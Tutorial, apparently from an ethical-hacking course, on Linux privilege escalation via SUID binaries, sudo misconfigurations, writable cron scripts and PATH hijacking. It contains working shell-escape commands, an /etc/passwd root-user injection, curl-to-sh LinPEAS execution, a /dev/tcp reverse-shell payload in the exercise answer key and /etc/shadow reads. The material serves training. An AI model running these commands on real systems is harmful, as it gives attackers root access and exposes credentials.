Linux Privilege Escalation 2026 — SUID, Sudo Misconfig & Cron Jobs Complete Guide | Hacking Course Day31

Mr Elite 11 min read
Linux Privilege Escalation 2026 — SUID, Sudo Misconfig & Cron Jobs Complete Guide | Hacking Course Day31
🛡️ ETHICAL HACKING COURSE
FREE

Part of the 100-Day Ethical Hacking Course

Day 31 of 100 · 31% complete

⚠️ Authorised Lab Environments Only: Privilege escalation techniques must only be practised on systems you own or in explicitly authorised penetration testing engagements. Escalating privileges on any system without written authorisation is a criminal offence.
Linux Privilege Escalation in 2026 :— Initial access as www-data or a low-privilege service account is not the goal. Root is the goal. The gap between “we have a low-privilege shell” and “we have root” is where the real penetration testing skill lives. Most Linux systems that are compromised at the service level are also compromised at the system level — because privilege escalation vectors are everywhere: a Python interpreter with the SUID bit set, a cron job running a writable script as root, a sudo rule that allows running an editor as root. This guide covers the four most common escalation vectors, LinPEAS for automated discovery, and the GTFOBins reference for exploiting every binary you find.

🎯 What You’ll Master in Day 31

Run LinPEAS and interpret colour-coded privilege escalation findings
Find and exploit SUID binaries using GTFOBins
Identify and exploit misconfigured sudo rules
Abuse writable cron job scripts to execute as root
Apply PATH hijacking to execute malicious binaries in root-run scripts

⏱️ 50 min read · 3 exercises

📋 Linux Privilege Escalation 2026

  1. Enumeration First — LinPEAS and Manual Checks
  2. SUID Binary Exploitation
  3. Sudo Misconfiguration Exploitation
  4. Cron Job Abuse
  5. PATH Hijacking

In Day 30 you established persistence mechanisms on Windows. Day 31 returns to a critical earlier phase: escalating from initial access to full system compromise on Linux. You cannot establish persistent access with real impact until you have root-level privileges — persistence and escalation always work together in the 100-Day Ethical Hacking Course.

Enumeration First — LinPEAS and Manual Checks

LINPEAS AND MANUAL ENUMERATION
# Download and run LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Save output for review
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh | tee /tmp/linpeas_out.txt
# Manual quick checks — run these first without LinPEAS
whoami && id && hostname
sudo -l # What can current user run as root?
find / -perm -4000 -type f 2>/dev/null # SUID files
cat /etc/crontab && ls -la /etc/cron* # Cron jobs
cat /etc/passwd | grep -v nologin # Users with shell access
find / -writable -type f 2>/dev/null | grep -v proc # Writable files
uname -a && cat /etc/os-release # Kernel version for exploit search
ps aux | grep root # Root-owned processes

🧠 EXERCISE 1 — THINK LIKE A HACKER (8 MIN · NO TOOLS)
Identify Privilege Escalation Vectors From a LinPEAS Output Snapshot

⏱️ Time: 8 minutes · No tools required

You have run LinPEAS on a compromised server and received
these findings (colour-coded: RED=critical, YELLOW=interesting):

[RED] SUID files found:
/usr/bin/python3.9 (owned by root)
/usr/bin/find
/usr/bin/nmap (version 5.21)

[RED] Sudo rules (sudo -l output):
(root) NOPASSWD: /usr/bin/vim /var/www/html/config.php

[YELLOW] Cron jobs (running as root):
*/5 * * * * /opt/backup/run_backup.sh
File permissions: -rwxrwxrwx (world-writable!)

[YELLOW] PATH-dependent script (owned by root, runs at login):
/usr/local/bin/system-check
Content: “ping -c 1 localhost” (uses relative path for ping)
/usr/local/bin is in your PATH and is world-writable

For each finding:
1. Which escalation technique applies?
2. What is the exact command or payload?
3. How quickly would this give you root?
4. Which finding would you exploit FIRST? Why?

✅ Answer key: SUID Python — fastest: python3.9 -c ‘import os; os.setuid(0); os.system(“/bin/bash”)’ → immediate root shell. SUID find — find . -exec /bin/sh \; → root shell. SUID nmap v5.21 — nmap –interactive → !sh. Sudo vim → vim opens config.php, then :!/bin/bash in vim command mode → root shell. Cron world-writable → echo ‘#!/bin/bash\nbash -i >& /dev/tcp/YOUR_IP/4444 0>&1’ > /opt/backup/run_backup.sh → wait up to 5 minutes for root reverse shell. PATH hijacking → create malicious ‘ping’ in /usr/local/bin → executed as root at next login. First choice: SUID Python — fastest, most reliable, immediate interactive root shell. The cron job is highest impact (guaranteed root) but requires waiting 5 minutes.

📸 Share your prioritised exploitation plan in #day-31-privesc on Discord.

SUID Binary Exploitation

SUID EXPLOITATION — COMMON BINARIES
# Find all SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Then check each against GTFOBins: gtfobins.github.io
# Common exploitable SUID binaries:
# Python (if SUID)
python3 -c ‘import os; os.setuid(0); os.system(“/bin/bash”)’
# Perl (if SUID)
perl -e ‘use POSIX qw(setuid); POSIX::setuid(0); exec “/bin/bash”;’
# Find (if SUID)
find . -exec /bin/sh -p \; -quit
# Vim (if SUID)
vim -c ‘:!/bin/bash’
# Bash (if SUID)
bash -p # -p flag preserves SUID privileges
# cp (if SUID — write to /etc/passwd)
echo ‘pwned:$1$salt$hash:0:0:root:/root:/bin/bash’ >> /etc/passwd
# After any escalation — confirm:
whoami && id
root
uid=0(root) gid=0(root) groups=0(root)

Sudo Misconfiguration Exploitation

SUDO EXPLOITATION — COMMON MISCONFIGURATIONS
# Check sudo rules first
sudo -l
(root) NOPASSWD: /usr/bin/vim
# Exploit: spawn shell from within vim
sudo vim -c ‘:!/bin/bash’
# Common sudo escalation via GTFOBins:
sudo less /etc/passwd → press !bash
sudo nano → ^R ^X then: reset; sh 1>&0 2>&0
sudo awk ‘BEGIN {system(“/bin/bash”)}’
sudo python3 -c ‘import os; os.system(“/bin/bash”)’
sudo find /tmp -exec /bin/bash \;
# Wildcard sudo rules (dangerous):
(root) NOPASSWD: /usr/bin/tar *
sudo tar -cf /dev/null /dev/null –checkpoint=1 –checkpoint-action=exec=/bin/bash
# LD_PRELOAD abuse (if sudo allows env_keep+=LD_PRELOAD)
cat /etc/sudoers | grep LD_PRELOAD

Cron Job Abuse

🌐 EXERCISE 2 — TRYHACKME (25 MIN)
Complete the TryHackMe Linux Privilege Escalation Room

⏱️ Time: 25 minutes · Free TryHackMe account

Step 1: Go to tryhackme.com
Step 2: Search: “Linux Privilege Escalation” room
Open: “Linux PrivEsc” or “Linux Privilege Escalation”

Step 3: Deploy machine and connect via VPN or AttackBox

Step 4: The room covers each vector — complete:
a) SUID/SGID escalation task
→ find the SUID binary, check GTFOBins, get root
b) Sudo escalation task
→ sudo -l, exploit the listed command, get root
c) Cron job task
→ find the writable cron script, replace with payload

Step 5: For each successful escalation, note:
– The exact binary/rule/script that was vulnerable
– The exploit command used
– The MITRE ATT&CK technique ID
(T1548.001 = SUID, T1053.003 = Cron, T1548.003 = Sudo)

Step 6: Screenshot each “root shell obtained” moment
with whoami output visible

✅ What you just learned: The TryHackMe room demonstrates each privilege escalation technique in a realistic environment where you have to identify the vector yourself before exploiting it — unlike CTF challenges that point you directly to the vulnerability. The MITRE ATT&CK technique ID notation is professional requirement for penetration test reporting: every privilege escalation finding should reference its technique ID so the client can map it to their threat intelligence and detection capabilities. A finding without a MITRE reference is less actionable for the blue team.

📸 Share root shell screenshots from all three escalation techniques in #day-31-privesc on Discord.

PATH Hijacking

⚡ EXERCISE 3 — KALI TERMINAL (15 MIN)
Perform Complete LinPEAS-to-Root Escalation on a Local Lab

⏱️ Time: 15 minutes · Kali · Metasploitable or TryHackMe

COMPLETE PRIVESC WORKFLOW — METASPLOITABLE
# Step 1: Gain initial shell on Metasploitable (low-priv)
ssh msfadmin@192.168.56.102 # password: msfadmin
# Step 2: Basic manual checks
whoami && id
msfadmin uid=1000(msfadmin)
sudo -l
find / -perm -4000 -type f 2>/dev/null
# Step 3: Download and run LinPEAS
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh 2>/dev/null | tee /tmp/lp.txt
# Step 4: Review RED findings
grep -A 2 “SUID\|sudo\|cron” /tmp/lp.txt | grep -v “^–$”
# Step 5: Exploit highest-confidence finding
# Metasploitable has nmap with –interactive SUID:
nmap –interactive
nmap> !sh
whoami
root
# Step 6: Document for report
id && cat /etc/shadow | head -5 # Prove root access

✅ What you just learned: The full workflow — initial shell → LinPEAS enumeration → vector identification → GTFOBins exploitation → root confirmation — mirrors exactly what a penetration tester does on every Linux target. Metasploitable’s intentional vulnerabilities (including the SUID nmap) make it an excellent training target. The documentation step (id && cat /etc/shadow) is what turns “I got root” into “I have evidence of root access for the report.” Always capture output showing uid=0 and proof of access to root-only files. This evidence chain is what makes a privilege escalation finding credible and reportable.

📸 Screenshot the full chain from initial shell to root whoami in #day-31-privesc on Discord. Tag #linuxprivesc2026

🧠 QUICK CHECK — Day 31

You run sudo -l and see: “(root) NOPASSWD: /usr/bin/nano /var/log/app.log”. You can run nano as root but only on the specific file /var/log/app.log. How do you escalate to a full root shell from this sudo rule?



📋 Linux Privilege Escalation Quick Reference — Day 31

LinPEASAutomated enumeration — run first, review RED findings, check GTFOBins for each
SUID — find / -perm -4000Find SUID binaries → GTFOBins → spawn shell as root (T1548.001)
Sudo — sudo -lCheck every listed binary against GTFOBins sudo entry (T1548.003)
Cron — /etc/crontabFind root-owned scripts with write permission → replace with reverse shell (T1053.003)
PATH hijackingWritable PATH dir + root script using relative commands → malicious binary (T1574.007)
GTFOBinsgtfobins.github.io — the essential reference for every SUID/sudo escalation technique

🏆 Mark Day 31 as Complete

Linux privilege escalation completes the post-exploitation picture on Linux targets. SUID, sudo, cron, and PATH hijacking cover the vast majority of real-world escalation vectors. Day 32 applies the equivalent techniques to Windows — unquoted service paths, weak service permissions, and token impersonation.


❓ Frequently Asked Questions

What is Linux privilege escalation?
Gaining root (uid=0) from a low-privilege user account after initial compromise. Common vectors: SUID binary abuse, misconfigured sudo, writable cron scripts, PATH hijacking, kernel exploits, weak file permissions.
What is a SUID binary and how is it exploited?
SUID bit causes a binary to run as its owner (often root) regardless of who executes it. Exploitable when a SUID binary can spawn a shell or execute commands — Python, find, vim. GTFOBins documents every exploitable SUID binary.
What is GTFOBins?
gtfobins.github.io — curated list of Unix binaries exploitable for SUID escalation, sudo escalation, file read/write, and shell spawning. The essential reference: look up every binary in your sudo -l or SUID results.
What is LinPEAS?
Automated Linux privilege escalation enumeration script. Checks hundreds of vectors and colour-codes by exploitability. Download from github.com/carlospolop/PEASS-ng. Run first, then manually exploit highest-confidence RED findings.
What comes after Day 31?
Day 32: Windows privilege escalation — unquoted service paths, weak service permissions, DLL hijacking, and token impersonation. Completes the full post-exploitation privilege escalation toolkit across both major operating systems.
← Previous

Day 30: Post-Exploitation Persistence 2026

Next →

Day 32: Windows Privilege Escalation 2026

📚 Further Reading

  • Post-Exploitation Persistence 2026 — Day 30 covers Windows persistence — complements Day 31 by covering the post-escalation phase: once you have root, persistence ensures you keep it.
  • Privilege Escalation Hub — Complete SecurityElites privilege escalation category covering Linux SUID/sudo/cron, Windows service exploits, and cross-platform escalation techniques.
  • 100-Day Ethical Hacking Course — The complete course hub — Day 31 privilege escalation is the start of the post-exploitation specialisation phase covering Days 31-45.
  • GTFOBins — The essential privilege escalation reference — every Unix binary that can be exploited for SUID abuse, sudo escalation, file read/write, and shell spawning with exact command examples.
  • LinPEAS — PEASS-ng GitHub — The LinPEAS automated privilege escalation enumeration script — download link, full documentation, and the complete list of checks the script performs with explanations of each finding category.
ME
Mr Elite
Owner, SecurityElites.com
The privilege escalation finding that fundamentally changed how I think about Linux security was on a supposedly hardened server — no world-writable files, no weak sudo rules, SUID cleaned up properly. The one thing LinPEAS flagged in yellow: a backup script in /usr/local/bin called system-health.sh, owned by root, running every night at 02:00. Clean script, nothing suspicious. But it called df, free, and uptime using relative paths — no full path specified. And /usr/local/bin was group-writable, and the compromised user was in that group. Create a file called df in /usr/local/bin that spawns a bash session to a listener, wait until 02:00, receive root shell. The lesson: PATH hijacking requires reading scripts that nobody reviews because they run at 2am and nobody watches them. LinPEAS finds the PATH issue. The script review reveals the opportunity. Always read the script before dismissing the finding.

cron job privilege escalation linpeas linux enumeration linux privesc 2026 sudo misconfiguration exploit suid binary exploitation

Leave a Reply

Your email address will not be published. Required fields are marked *